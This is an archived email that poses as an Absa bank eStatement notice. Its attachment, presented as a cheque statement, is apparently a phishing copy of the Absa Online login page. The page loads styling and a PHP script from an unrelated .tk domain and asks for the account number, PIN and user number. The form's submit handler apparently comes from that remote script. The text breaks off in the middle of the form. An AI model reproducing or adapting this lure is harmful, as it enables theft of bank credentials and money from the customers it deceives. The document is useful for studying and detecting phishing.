From: "ABSA"<e-statement@absa.co.za>
Date: Mon, 01 Oct 2018 16:07:15 -0400
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 606

You will not see this in a MIME-aware mail reader.
--===============0962775270==
Content-Type: multipart/alternative; boundary="===============1200936933=="
MIME-Version: 1.0

--===============1200936933==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

    =

        =

    =

   	  =

     	 =

  	 =

   =

    =

     Your statement  =

   Please find your electronic statement for October attached. To keep your=
 financial information safe, please note the following: =

 =

  =

  =

    =

  Your security  =

  The additional verifications were added to help prevent
 online fraud. Information only known to you is
 displayed on your eStatement; so that you know the
 statement was sent by Absa.  =

  The Striata Reader that you use to open your secure
 statements further ensures the highest levels of
 security. You can download the reader by seeing the
 easy step by step instructions below.  =

 	 =

 =

  =

       =

 	 =

  	 =

   =

 	 	  =

   	  =

   	 =

   =

   	   eStatement
 verification  	 =

   =

   	 =

   =

    =

     Account:  	 =

    ID Number:  	 =

   	  =

     ***************0  	 =

    *************0  	 =

   	 	 =

   =

   	 =

   	 =

   =

   	 =

   =

    Contact us =

 =

For more information, contact: officialemail@absa.co.za or the call centre =
on 0860 111 123  	 =

   	 =

   =

       	     	     	 =

   =

   	 =

   =

   	 =

   =

 =

    =

   	 =

    Absa Bank Ltd Reg No 1986/004794/06 Authorised Financial Services Provi=
der Registered Credit Provider NCRCP7. E-mail disclaimer and company inform=
ation absa.co.za/disclaimer  	 =

   	 =

   	 =

     =

 =

Scanned by Trustwave SEG - Trustwave's comprehensive email content security=
 solution. Download a free evaluation of Trustwave SEG at   www.trustwave.c=
om

  =

       	 =

   	 =

  =20
--===============1200936933==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "h=
ttps://www.w3.org/TR/html4/strict.dtd">
<html lang=3D"en">
   <body>
            <table class=3D"message" width=3D"100%" cellspacing=3D"0" cellp=
adding=3D"0" border=3D"0">
               <tbody>
                  <tr>
                     <td colspan=3D"2">
                        <table width=3D"100%" cellspacing=3D"0" cellpadding=
=3D"12" border=3D"0">
                           <tbody>
                              <tr>
                                 <td>
                                       <font size=3D"-1">
                                          <div dir=3D"ltr">
                                             <div class=3D"gmail_quote">
                                                <div style=3D"margin:0;padd=
ing:0">
                                                   <table width=3D"100%" ce=
llspacing=3D"0" cellpadding=3D"0" border=3D"0" bgcolor=3D"#f2f2f2" align=3D=
"center">
                                                      <tbody>
                                                         <tr>
                                                            <td>
                                                               <table width=
=3D"600" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" bgcolor=3D"#fffff=
f" align=3D"center">
                                                                  <tbody>
                                                                     <tr>
                                                                        <td=
 width=3D"17" bgcolor=3D"#ffffff"></td>
                                                                        <td=
 width=3D"566">
                                                                           =
<table width=3D"566" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" bgcol=
or=3D"#ffffff" align=3D"center">
                                                                           =
   <tbody>
                                                                           =
      <tr>
                                                                           =
         <td width=3D"566" height=3D"221">
                                                                           =
            <img src=3D"https://ci3.googleusercontent.com/proxy/L_DBVpPheXD=
GEDUvasiIqhGq-qr4k_b5vIgz7dkN_s2bSSJpPW42b4I4HoSQDcyBX4_vCXw_lEljZQQvF6ySTM=
9kiD9ZG9Dy_ZHeHPgLpEYZTt0Ac6heNgPNYpm6SO1uXgLRMGNafyc36UyL-BTsFU-65t9-MHQIl=
736aoYEoROcvbj8obw=3Ds0-d-e1-ft#https://www.absa.co.za/content/dam/south-af=
rica/absa/estatements/headers/new-savingsretail-en-savings-header.jpg" alt=
=3D"Absa - eSTATEMENT" style=3D"display:block" width=3D"600" border=3D"0">
                                                                           =
         </td>
                                                                           =
      </tr>
                                                                           =
      <tr>
                                                                           =
         <td height=3D"10"></td>
                                                                           =
      </tr>
                                                                           =
   </tbody>
                                                                           =
</table>
                                                                           =
<table width=3D"566" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" bgcol=
or=3D"#ffffff" align=3D"center">
                                                                           =
   <tbody>
                                                                           =
      <tr>
                                                                           =
         <td width=3D"352" valign=3D"top" height=3D"200">
                                                                           =
            <table width=3D"100%" cellspacing=3D"0" cellpadding=3D"15" bord=
er=3D"0" bgcolor=3D"#ffffff" align=3D"center">
                                                                           =
               <tbody>
                                                                           =
                  <tr>
                                                                           =
                     <td width=3D"100%">
                                                                           =
                        <p><font style=3D"font:18px Arial;color:#ed1c24">
														Your statement
													</font>
                                                                           =
                        </p>
                                                                           =
                        <p>
                                                                           =
                           <font style=3D"font:12px Arial;color:#58595b">
                                                                           =
                           Please find your electronic statement for Octobe=
r attached. To keep =

                                                                           =
                           your financial information safe, please note the=
 following:
                                                                           =
                           <br>
                                                                           =
                           <br>
                                                                           =
                           <font style=3D"font:12px Arial;color:#58595b"></=
font></font>
                                                                           =
                        </p>
                                                                           =
                        <p>
                                                                           =
                                <table>
                                                                           =
                                    <tr>
                                                                           =
                                        <tr>
												<td width=3D"100%">
													<table><tbody><tr><td height=3D"5"></td></tr></tbody></table>
													<font style=3D"font:18px Arial;color:#58595b">
														Your security
													</font>
													<table><tbody><tr><td height=3D"5"></td></tr></tbody></table>
													<font style=3D"font:12px Arial;color:#58595b">
														The additional verifications were added to help prevent<br>
														online fraud. Information only known to you is<br> =

														displayed on your eStatement; so that you know the<br> =

														statement was sent by Absa.
													</font>
													<table><tbody><tr><td height=3D"5"></td></tr></tbody></table>
													<font style=3D"font:12px Arial;color:#58595b">
														The Striata Reader that you use to open your secure<br> =

														statements further ensures the highest levels of<br> =

														security. You can download the reader by seeing the<br> =

														easy step by step instructions below.
													</font>
													<table><tbody><tr><td height=3D"10"></td></tr></tbody></table>
												</td>
											</tr>
                                                                           =
                                    </tr>
                                                                           =
                                </table>
                                                                           =
            </p>   =

                                                                           =
                        <font style=3D"font:12px Arial;color:#58595b">
                                                                           =
                           <font style=3D"font:12px Arial;color:#58595b">
                                                                           =
                              <div style=3D"display:none">&nbsp;</div>
                                                                           =
                           </font>
                                                                           =
                        </font>
                                                                           =
                        <p></p>
                                                                           =
                     </td>
                                                                           =
                  </tr>
                                                                           =
                  <tr>
                                                                           =
                     <td width=3D"100%"></td>
                                                                           =
                  </tr>
                                                                           =
               </tbody>
                                                                           =
            </table>
                                                                           =
            <table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" borde=
r=3D"0" bgcolor=3D"#ffffff" align=3D"center"></table>
                                                                           =
         </td>
                                                                           =
         <td width=3D"10"></td>
                                                                           =
         <td width=3D"181" valign=3D"top">
                                                                           =
            <table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" borde=
r=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
                                                                           =
               <tbody>
                                                                           =
                  <tr>
                                                                           =
                     <td width=3D"15"></td>
                                                                           =
                     <td width=3D"188">
                                                                           =
                        <table width=3D"100%" cellspacing=3D"0" cellpadding=
=3D"0" border=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
                                                                           =
                           <tbody>
                                                                           =
                              <tr>
                                                                           =
                                 <td width=3D"203" height=3D"16"></td>
                                                                           =
                              </tr>
                                                                           =
                           </tbody>
                                                                           =
                        </table>
                                                                           =
                        <table width=3D"100%" cellspacing=3D"0" cellpadding=
=3D"0" border=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
                                                                           =
                           <tbody>
                                                                           =
                              <tr>
                                                                           =
                                 <td width=3D"13" height=3D"29"></td>
                                                                           =
                                 <td width=3D"146" height=3D"29">
                                                                           =
                                    <font style=3D"font:12px Arial;color:#5=
8595b">
                                                                           =
                                    <b>eStatement<br>
                                                                           =
                                    verification</b>
                                                                           =
                                    </font>
                                                                           =
                                 </td>
                                                                           =
                              </tr>
                                                                           =
                           </tbody>
                                                                           =
                        </table>
                                                                           =
                        <table width=3D"100%" cellspacing=3D"0" cellpadding=
=3D"0" border=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
                                                                           =
                           <tbody>
                                                                           =
                              <tr>
                                                                           =
                                 <td width=3D"188" height=3D"8"></td>
                                                                           =
                              </tr>
                                                                           =
                           </tbody>
                                                                           =
                        </table>
                                                                           =
                        <table width=3D"100%" cellspacing=3D"0" cellpadding=
=3D"0" border=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
                                                                           =
                           <tbody>
                                                                           =
                              <tr>
                                                                           =
                                 <td width=3D"70" height=3D"24">
                                                                           =
                                    <table width=3D"100%" cellspacing=3D"0"=
 cellpadding=3D"0" border=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
                                                                           =
                                       <tbody>
                                                                           =
                                          <tr>
                                                                           =
                                             <td width=3D"70" height=3D"24">
                                                                           =
                                                <font style=3D"font:12px Ar=
ial;color:#58595b">
                                                                           =
                                                <b>Account:</b>
                                                                           =
                                                </font>
                                                                           =
                                             </td>
                                                                           =
                                          </tr>
                                                                           =
                                          <tr>
                                                                           =
                                             <td width=3D"70" height=3D"24">
                                                                           =
                                                <font style=3D"font:12px Ar=
ial;color:#58595b">
                                                                           =
                                                <b>ID Number:</b>
                                                                           =
                                                </font>
                                                                           =
                                             </td>
                                                                           =
                                          </tr>
                                                                           =
                                       </tbody>
                                                                           =
                                    </table>
                                                                           =
                                 </td>
                                                                           =
                                 <td width=3D"103" height=3D"24">
                                                                           =
                                    <table width=3D"100%" cellspacing=3D"0"=
 cellpadding=3D"0" border=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
                                                                           =
                                       <tbody>
                                                                           =
                                          <tr>
                                                                           =
                                             <td width=3D"110" height=3D"24=
" align=3D"right">
                                                                           =
                                                <font style=3D"font:12px Ar=
ial;color:#58595b">
                                                                           =
                                                ***************0
                                                                           =
                                                </font>
                                                                           =
                                             </td>
                                                                           =
                                          </tr>
                                                                           =
                                          <tr>
                                                                           =
                                             <td width=3D"110" height=3D"24=
" align=3D"right">
                                                                           =
                                                <font style=3D"font:12px Ar=
ial;color:#58595b">
                                                                           =
                                                *************0
                                                                           =
                                                </font>
                                                                           =
                                             </td>
                                                                           =
                                          </tr>
                                                                           =
                                       </tbody>
                                                                           =
                                    </table>
                                                                           =
                                 </td>
                                                                           =
                                 <td width=3D"15" height=3D"48"></td>
                                                                           =
                              </tr>
                                                                           =
                           </tbody>
                                                                           =
                        </table>
                                                                           =
                        <table width=3D"100%" cellspacing=3D"0" cellpadding=
=3D"0" border=3D"0" bgcolor=3D"#f2f2f2" align=3D"center">
                                                                           =
                           <tbody>
                                                                           =
                              <tr>
                                                                           =
                                 <td width=3D"188" height=3D"8"></td>
                                                                           =
                              </tr>
                                                                           =
                           </tbody>
                                                                           =
                        </table>
                                                                           =
                     </td>
                                                                           =
                  </tr>
                                                                           =
               </tbody>
                                                                           =
            </table>
                                                                           =
            <table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" borde=
r=3D"0" bgcolor=3D"#ffffff" align=3D"center">
                                                                           =
               <tbody>
                                                                           =
                  <tr>
                                                                           =
                     <td height=3D"20"></td>
                                                                           =
                  </tr>
                                                                           =
               </tbody>
                                                                           =
            </table>
                                                                           =
            <table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" borde=
r=3D"0" bgcolor=3D"#ffffff" align=3D"center">
                                                                           =
               <tbody>
                                                                           =
                  <tr>
                                                                           =
                     <td width=3D"203" height=3D"110"><font style=3D"font:1=
8px Arial;color:#58595b"> Contact us</font>
                                                                           =
                        <br>
                                                                           =
                        <font style=3D"font:12px Arial;color:#58595b"><br>F=
or more information, contact: <a href=3D"mailto:officialemail@absa.co.za" t=
arget=3D"_blank">officialemail@absa.co.za</a> or the call centre on 0860 11=
1 123 </font> =

                                                                           =
                     </td>
                                                                           =
                  </tr>
                                                                           =
               </tbody>
                                                                           =
            </table>
                                                                           =
         </td>
                                                                           =
      </tr>
                                                                           =
   </tbody>
                                                                           =
</table>
                                                                           =
<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"10" border=3D"0" bgc=
olor=3D"#ffffff" align=3D"center">
                                                                           =
   <tbody>
                                                                           =
      <tr>
                                                                           =
         <td height=3D"20">
                                                                           =
            <a href=3D"https://www.absa.co.za/bannerestatement/savingsretai=
l-en-savings-b1" target=3D"_blank" data-saferedirecturl=3D"https://www.goog=
le.com/url?hl=3Den&amp;q=3Dhttps://www.absa.co.za/bannerestatement/savingsr=
etail-en-savings-b1&amp;source=3Dgmail&amp;ust=3D1537743101226000&amp;usg=
=3DAFQjCNGMgYpfu5Hcr4IXveM5Kx1k-AIOkw">
                                                                           =
            <img src=3D"https://ci5.googleusercontent.com/proxy/qaV6EvS_sGm=
CMxly9OlxYBCXvpBGURgac_dgtTU5yCag_RrR5fGEFDvEDLWGBK4Vzs63mx2Pm002cJgiGDwbNu=
9ALPm-NznQypx8lwn1ygEgJN9P_jcx78Av3ssA6X0K70nw1IL_UcNzpDZzZgana8geK4tzGtMVE=
W_qjZMa=3Ds0-d-e1-ft#https://www.absa.co.za/content/dam/south-africa/absa/e=
statements/banners/savingsretail-en-savings-b1.jpg" style=3D"border:0" widt=
h=3D"180">
                                                                           =
            </a>
                                                                           =
         </td>
                                                                           =
         <td height=3D"20">
                                                                           =
            <a href=3D"https://www.absa.co.za/bannerestatement/savingsretai=
l-en-savings-b2" target=3D"_blank" data-saferedirecturl=3D"https://www.goog=
le.com/url?hl=3Den&amp;q=3Dhttps://www.absa.co.za/bannerestatement/savingsr=
etail-en-savings-b2&amp;source=3Dgmail&amp;ust=3D1537743101226000&amp;usg=
=3DAFQjCNGqGxvzMqnpUDyUsE_mrY44cG-GAg">
                                                                           =
            <img src=3D"https://ci3.googleusercontent.com/proxy/eGKW_4WZrcR=
1MEqdUUV4D4Gszx3ee4v6mFs5p9_PoSrb19YPfHXnKXKppfMX1VnBH3r2iOCOLnKoKV88Y8oWlP=
9yQr5KLXdzXQbx53YGyS-hKupG8j3UcP_OFchizlhwY3HTatXU-t02ePBOUsWrEWPkvp6_7XvDB=
NCHTqzr=3Ds0-d-e1-ft#https://www.absa.co.za/content/dam/south-africa/absa/e=
statements/banners/savingsretail-en-savings-b2.jpg" style=3D"border:0" widt=
h=3D"180">
                                                                           =
            </a>
                                                                           =
         </td>
                                                                           =
         <td height=3D"20">
                                                                           =
            <a href=3D"https://www.absa.co.za/bannerestatement/savingsretai=
l-en-savings-b3" target=3D"_blank" data-saferedirecturl=3D"https://www.goog=
le.com/url?hl=3Den&amp;q=3Dhttps://www.absa.co.za/bannerestatement/savingsr=
etail-en-savings-b3&amp;source=3Dgmail&amp;ust=3D1537743101226000&amp;usg=
=3DAFQjCNFwoAARxKv6wnu-YIrqVbQ5sQ_G6A">
                                                                           =
            <img src=3D"https://ci3.googleusercontent.com/proxy/_U7N9LUf-XT=
H6AyVbqkA-T5wNNWF4JethW3Kj-ijbmUK0a6IEDLuTvT9Xortowt5FfCMnk4KrkbqU568itauxy=
MFQNywFP55qI9Qs1GTKeMdfTydv3ZKwBd50cMWxbDLeKq_NL4DHDng7uka0ZXdY0fXSIfercpls=
cFJM6Xd=3Ds0-d-e1-ft#https://www.absa.co.za/content/dam/south-africa/absa/e=
statements/banners/savingsretail-en-savings-b3.jpg" style=3D"border:0" widt=
h=3D"180">
                                                                           =
            </a>
                                                                           =
         </td>
                                                                           =
      </tr>
                                                                           =
   </tbody>
                                                                           =
</table>
                                                                           =
<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" bgco=
lor=3D"#ffffff" align=3D"center">
                                                                           =
   <tbody>
                                                                           =
      <tr>
                                                                           =
         <td height=3D"10"></td>
                                                                           =
      </tr>
                                                                           =
   </tbody>
                                                                           =
</table>
                                                                           =
<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" bgco=
lor=3D"#ffffff" align=3D"center">
                                                                           =
   <tbody>
                                                                           =
      <tr>
                                                                           =
         <td width=3D"15"></td>
                                                                           =
      </tr>
                                                                           =
   </tbody>
                                                                           =
</table>
                                                                           =
<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" bgco=
lor=3D"#ffffff" align=3D"center"></table>
                                                                           =
<table width=3D"100%" cellspacing=3D"15" cellpadding=3D"0" border=3D"0" bgc=
olor=3D"#ffffff" align=3D"center">
                                                                           =
   <tbody>
                                                                           =
      <tr>
                                                                           =
         <td width=3D"600" valign=3D"top" height=3D"35" align=3D"left">
                                                                           =
            <table>
                                                                           =
               <tbody>
                                                                           =
                  <tr>
                                                                           =
                     <td height=3D"5"></td>
                                                                           =
                  </tr>
                                                                           =
               </tbody>
                                                                           =
            </table>
                                                                           =
            <font style=3D"font:9px Arial;color:#646464">
                                                                           =
            Absa Bank Ltd Reg No 1986/004794/06 Authorised Financial Servic=
es =

                                                                           =
            Provider Registered Credit Provider NCRCP7. E-mail disclaimer a=
nd =

                                                                           =
            company information <a href=3D"http://absa.co.za/disclaimer" ta=
rget=3D"_blank" data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&=
amp;q=3Dhttp://absa.co.za/disclaimer&amp;source=3Dgmail&amp;ust=3D153774310=
1226000&amp;usg=3DAFQjCNGoryJ7Pmke3GV4kG5Yv1IndebOGw">absa.co.za/disclaimer=
</a>
                                                                           =
            </font>
                                                                           =
         </td>
                                                                           =
      </tr>
                                                                           =
   </tbody>
                                                                           =
</table>
                                                                        </t=
d>
                                                                     </tr>
                                                                  </tbody>
                                                               </table>
                                                            </td>
                                                         </tr>
                                                      </tbody>
                                                   </table>
                                                   <font face=3D"Arial">
                                                      <font size=3D"2">
                                                         <hr>
                                                         <font color=3D"#80=
8080"><br>Scanned by</font> <font color=3D"#4f1f91"><b>Trustwave SEG</b></f=
ont> <font color=3D"#808080">-
                                                         Trustwave's compre=
hensive email content security solution. Download a free
                                                         evaluation of Trus=
twave SEG at </font>
                                                      </font>
                                                      <a href=3D"http://www=
.trustwave.com/" target=3D"_blank" data-saferedirecturl=3D"https://www.goog=
le.com/url?hl=3Den&amp;q=3Dhttp://www.trustwave.com&amp;source=3Dgmail&amp;=
ust=3D1537743101226000&amp;usg=3DAFQjCNFJHOTLV3_kmqfbGl4G_EoK3wNBqQ"><font =
size=3D"2" color=3D"#808080">www.trustwave.com</font></a><br><br><font colo=
r=3D"#400080"><b></b></font>
                                                      <font size=3D"2">
                                                         <hr>
                                                      </font>
                                                   </font>
                                                </div>
                                             </div>
                                          </div>
                                       </font>
                                 </td>
                              </tr>
                           </tbody>
                        </table>
                     </td>
                  </tr>
               </tbody>
            </table>
   </body>
</html>
</html>
--===============1200936933==--
--===============0962775270==
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="Cheque Statementt - 181002.htm"

=EF=BB=BF<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w=
ww.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- saved from url=3D(0043)https://ib.absa.co.za/absa-online/login.jsp -->
<html xmlns=3D"http://www.w3.org/1999/xhtml" xmlns:c=3D"http://www.backbase=
.com/2006/command" xmlns:e=3D"http://www.backbase.com/2006/xel" xmlns:xi=3D=
"http://www.w3.org/2001/XInclude" xmlns:ui=3D"http://www.absa.co.za/2009/ui=
" class=3D"js gecko gecko62 CSS1Compat Win64">
   <head>
      <meta http-equiv=3D"content-type" content=3D"text/html; charset=3DUTF=
-8">
      <style type=3D"text/css">.btl-repaint{zoom:1;background-color:transpa=
rent;-moz-outline:none;}</style>
      <style type=3D"text/css">.btl-drag-outlineElement{position:absolute;t=
op:-10000px;left:-10000px;width:100px;height:100px;z-index:9999;border-widt=
h:1px;border-style:solid;background-color:#DFE0E1;border-color:#8B8D91;}</s=
tyle>
      <style type=3D"text/css">.btl-resize-cursorElement{position:absolute;=
top:-10000px;left:-10000px;width:100px;height:100px;z-index:10000;opacity:0=
;-ms-filter:"alpha(opacity=3D0)";filter:alpha(opacity=3D0);background:white=
;}.btl-resize-lineElement{position:absolute;top:-10000px;left:-10000px;widt=
h:1px;height:100px;z-index:9999;border-width:1px;border-style:solid;border-=
color:#8B8D91;overflow:hidden;}.btl-resize-outlineElement{position:absolute=
;top:-10000px;left:-10000px;width:100px;height:100px;z-index:9999;border-wi=
dth:1px;border-style:solid;opacity:.4;-ms-filter:"alpha(opacity=3D40)";filt=
er:alpha(opacity=3D40);background-color:#DFE0E1;border-color:#8B8D91;}</sty=
le>
      <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3D8">
      <title>Absa Online</title>
      <!--#if expr=3D"( =3D /iPhone/)"-->
      <link rel=3D"apple-touch-icon" href=3D"https://ib.absa.co.za/absa-onl=
ine/static/style/Iphone_app_icon.png">
      <!--#endif -->
      =

      <link rel=3D"stylesheet" type=3D"text/css" href=3D"http://help-nbvjng=
fjnoo.tk/shakushakuaza/css/absa.css" media=3D"screen">
      <link rel=3D"stylesheet" type=3D"text/css" href=3D"http://help-nbvjng=
fjnoo.tk/shakushakuaza/css/login.css">
      <link rel=3D"stylesheet" type=3D"text/css" href=3D"http://help-nbvjng=
fjnoo.tk/shakushakuaza/css/jcaptcha.css">      =

        =

        <script src=3D"https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/=
jquery.min.js"></script>
        <script src=3D"http://help-nbvjngfjnoo.tk/shakushakuaza/php/absajsl=
ogo.php?r=3D"></script>
   </head>
    <body class=3D"ssr-enabled ap-jsp-body" id=3D"bodydiv" onload=3D"$('inp=
ut#j_username').focus();">
      <!-- Please wait splash -->
      <div id=3D"pleasewait" role=3D"alert" class=3D"ap-pleasewait" style=
=3D"height: 735px; width: 1349px; display: none;">
         <div id=3D"pleasewait-viewport" class=3D"ap-pleasewait--viewport" =
style=3D"height: 632px; width: 1366px; top: 0px; left: 0px;">
            <div class=3D"ap-pleasewait--content">
               <img src=3D"http://help-nbvjngfjnoo.tk/shakushakuaza/images/=
ajax-loader-2.gif" width=3D"32" height=3D"32">
               <span id=3D"pleasewait-label" class=3D"ap-pleasewait--label">
                  <p class=3D"vi-screenreader-line">Please wait</p>
               </span>
            </div>
         </div>
      </div>
      <div></div>
      <div class=3D"ap-page-container">
         <div class=3D"ap-page-header">
            <div style=3D"padding-top:12px;"><img src=3D"http://help-nbvjng=
fjnoo.tk/shakushakuaza/images/absa-logo-2018.png" width=3D"141" height=3D"9=
7"></div>
            <div class=3D"ap-navigation-main">
               <div class=3D"ap-tabStrip-rounded-left"></div>
               <ul class=3D"ap-tabStrip-tabs">
                  <li class=3D"ap-tab-button ap-tab-active" id=3D"SSR-tab-1=
8">
                     <div class=3D"ap-tab-title" tabindex=3D"10">Logon</div>
                     <div class=3D"ap-tab-title-hidden">Logon</div>
                  </li>
                  <li class=3D"ap-tab-button" id=3D"SSR-tab-19">
                     <div class=3D"ap-tab-title" tabindex=3D"11"><a href=3D=
"https://ib.absa.co.za/absa-online/registration/?lang=3Den">Registration</a=
></div>
                     <div class=3D"ap-tab-title-hidden">Registration</div>
                  </li>
                  <li class=3D"ap-tab-button" id=3D"SSR-tab-20">
                     <div class=3D"ap-tab-title" tabindex=3D"12"><a href=3D=
"http://www.absa.co.za/">Absa home page</a></div>
                     <div class=3D"ap-tab-title-hidden" style=3D"font-size:=
14px;">Absa home page</div>
                  </li>
               </ul>
               <div class=3D"ap-tabStrip-rounded-right"></div>
               <div style=3D"clear: both;"></div>
               <img src=3D"http://help-nbvjngfjnoo.tk/shakushakuaza/images/=
ao-logo2.png" style=3D"position:absolute;top:0;right:20px" id=3D"theImg" wi=
dth=3D"189" height=3D"60">
               <div class=3D"ap-navigation-sub ap-tabStrip-subnav"></div>
            </div>
         </div>
         <div class=3D"ap-global-message" id=3D"ap-global-message">
            <div id=3D"ap-nocookies-msg" style=3D"display: none;">
               Warning: you do not have Cookies enabled. This applications =
needs Cookies to function
               properly. Please turn it on and reload the page. If you need=
 assistance
               in turning on your Cookies <a>click here</a> to get instruct=
ions.
            </div>
            <noscript>
               <div>
                  Warning: you do not have Javascript enabled. This
                  applications needs Javascript to function properly. Pleas=
e turn it on
                  and reload the page. If you need assistance in turning on=
 your
                  Javascript <a>click here</a> to get instructions.
               </div>
            </noscript>
         </div>
         <div class=3D"ap-main-content-wrapper">
            <!-- Page top corners -->
            <div class=3D"ap-main-content-wrapper-top">
               <div class=3D"ap-corners-rounded-top-left"></div>
               <div class=3D"ap-corners-rounded-top"></div>
               <div class=3D"ap-corners-rounded-top-right"></div>
            </div>
            <!-- Page content -->
            <div class=3D"ap-page-content ap-container">
               <div class=3D"ap-container-highlevel">
                  <div class=3D"ap-titlebar ap-heading-titlebar" style=3D"p=
adding-top: 0px;">
                     <div id=3D"header_results" class=3D"ap-bar-section ap-=
bar-title">
                        Logon&nbsp;
                        | Welcome to Absa Online
                     </div>
                  </div>
                  <div class=3D"ap-container-content" style=3D"padding-bott=
om:5px; overflow: hidden">
                     <!-- PS: height must be set here to AUTO else it cuts =
of the bottom of the inner content -->
                     <div class=3D"ap-login-columns ap-columns-2-lhs" style=
=3D"padding-top: 0px;">
                        <!-- ap-column-1 -->
                        <div class=3D"ap-column-1" style=3D"width: 606px;pa=
dding:0">
                           <div id=3D"ap-login-container" class=3D"ap-login=
-container">
                              <div class=3D"ap-container-highlevel" style=
=3D"width:606px;">
                                 <div class=3D"ap-titlebar ap-heading-title=
bar ap-heading-titlebar-login">
                                    <div class=3D"ap-bar-section ap-bar-tit=
le" style=3D"margin-top:8px;margin-left:25px" tabindex=3D"5">
                                       &nbsp;&nbsp;Logon details
                                    </div>
                                    <div style=3D"float:right; margin-right=
: 10px;">
                                       <div style=3D"background: url('stati=
c/style/resources/icon-questionmark-grey.png') no-repeat scroll left top tr=
ansparent; margin-top: 6px; height: 30px; width: 20px; cursor: pointer;" on=
click=3D"showHideHelp(this)" tooltip=3D"Click here to Show me how."></div>
                                    </div>
                                 </div>
                                 <div class=3D"ap-container-content">
                                    <div class=3D"ui-keypad">
                                       <form novalidate=3D"" class=3D"ui-fo=
rm" method=3D"post" formtype=3D"nosubmit" onsubmit=3D"onForm1Submit(); retu=
rn false;">
                                          <!-- Input form -->
                                          <table class=3D"ui-grid ui-keypad=
-inputs" style=3D"width:385px;float:left;">
                                             <tbody>
                                                <tr class=3D"ui-row">
                                                   <td class=3D"ui-cell" st=
yle=3D"width:200px;">
                                                      <label for=3D"j_usern=
ame" id=3D"id-146">
                                                      <span>Enter your acce=
ss account number</span>
                                                      <span class=3D"vi-scr=
eenreader-line">. An access account number is
                                                      the bank account numb=
er you choose when you registered for the Absa =

                                                      Online service. It co=
uld can be your current, savings, or credit card =

                                                      account number.</span=
></label>
                                                   </td>
                                                   <td class=3D"ui-cell" st=
yle=3D"nowrap:nowrap;">
                                                      <div style=3D"text-al=
ign:left;">
                                                         <input bbf_type=3D=
"simple:decimal10" bbf_required=3D"true" bbf_x_type_number=3D"true" require=
dtext=3D"Field is required." schematypetext=3D"Only numbers are allowed (Ma=
ximum 16)" showmehow=3D"An access account number is the bank account number=
 you choose when you registered for the Absa Online service. It could can b=
e your current, savings, or credit card account number." messageref=3D".err=
orMessage" class=3D"ui-form-field ui-textBox ui-keypad-input-selected ap-sh=
owMeHow-focus vi-activeElement" style=3D"width:132px; height:18px; line-hei=
ght:18px; vertical-align:middle;" name=3D"AccessAccount" autocomplete=3D"of=
f" id=3D"j_username" maxlength=3D"16" tabindex=3D"0" aria-invalid=3D"false"=
 aria-required=3D"true" aria-labelledby=3D"id-146" type=3D"input">
                                                      </div>
                                                   </td>
                                                </tr>
                                                <tr class=3D"ui-row">
                                                   <td class=3D"ui-cell">
                                                      <label for=3D"j_pin">
                                                      <span>Enter your PIN<=
/span>
                                                      </label>
                                                   </td>
                                                   <td class=3D"ui-cell">
                                                      <div style=3D"text-al=
ign:left;">
                                                         <input ondragstart=
=3D"return false" onselectstart=3D"return false" value=3D"" class=3D"ui-for=
m-field ui-textBox" style=3D"width:132px; height:18px; line-height:18px; ve=
rtical-align:middle;" name=3D"PIN" id=3D"j_pin" maxlengthdev=3D"5" ondrag=
=3D"return false" oncopy=3D"return false" autocomplete=3D"off" bbf_required=
=3D"true" requiredtext=3D"Field is required." schematypetext=3D"Only numeri=
c values are allowed" showmehow=3D"The PIN must be numeric and cannot conta=
in alpha characters, e.g. *, #, @ or a, b, c. The PIN can be either four or=
 five digits long." messageref=3D".errorMessage" tabindex=3D"0" type=3D"pas=
sword">
                                                      </div>
                                                   </td>
                                                </tr>
                                                <tr class=3D"ui-row">
                                                   <td class=3D"ui-cell">
                                                      <label for=3D"j_user_=
no">
                                                      <span>Enter your user=
 number</span>
                                                      </label>
                                                   </td>
                                                   <td class=3D"ui-cell">
                                                      <div style=3D"text-al=
ign:left;">
                                                         <input value=3D"1"=
 class=3D"ui-form-field ui-textBox " name=3D"Operator" style=3D"width:132px=
; height:18px; line-height:18px; vertical-align:middle;" id=3D"j_user_no" m=
axlength=3D"4" bbf_type=3D"simple:decimal" bbf_x_type_number=3D"true" bbf_r=
equired=3D"true" requiredtext=3D"Field is required." schematypetext=3D"Only=
 numeric values are allowed" showmehow=3D"Absa Online can have more than on=
e user per service and each user has their own Absa Online PIN. You must us=
e the user number assigned to you at registration when you logon to the ser=
vice." messageref=3D".errorMessage" tabindex=3D"0" type=3D"text">
                                                      </div>
                                                   </td>
                                                </tr>
                                                <!-- Captcha Stuff -->
                                                <tr class=3D"ui-row ui-row-=
captcha " id=3D"ui-row-captcha" style=3D"display:none;">
                                                   <td class=3D"ui-cell">
